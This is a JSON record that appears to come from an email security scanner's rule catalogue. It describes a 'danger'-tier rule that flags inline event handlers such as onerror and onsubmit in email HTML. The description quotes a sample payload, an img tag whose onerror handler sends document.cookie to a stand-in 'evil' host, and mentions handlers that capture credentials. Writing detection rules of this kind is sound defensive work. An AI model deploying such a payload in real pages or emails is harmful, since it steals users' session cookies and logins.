{"success":true,"data":{"id":"inline-event-handler-in-body","label":"Inline event handler in body — onclick / onerror / onload in an HTML tag (script execution vector)","description":"HTML body contains an inline DOM event handler attribute — `onclick`, `onerror`, `onload`, `onmouseover`, `onsubmit`, or similar. Companion to script-in-body: inline handlers are a script-execution vector that doesn't need a `<script>` tag, so scanners that only look for `<script>` miss this attack shape. The canonical pattern is `<img onerror=\"fetch('evil/'+document.cookie)\" src=\"broken.png\">` — the image fails to load, the handler fires, the exfiltrator runs. `<form onsubmit=\"...\">` variants intercept credentials before submit. Legitimate email platforms strip these on output because mail clients would strip them anyway — presence in raw MIME is a near-perfect attacker fingerprint.","tier":"danger","category":"body","isThin":false}}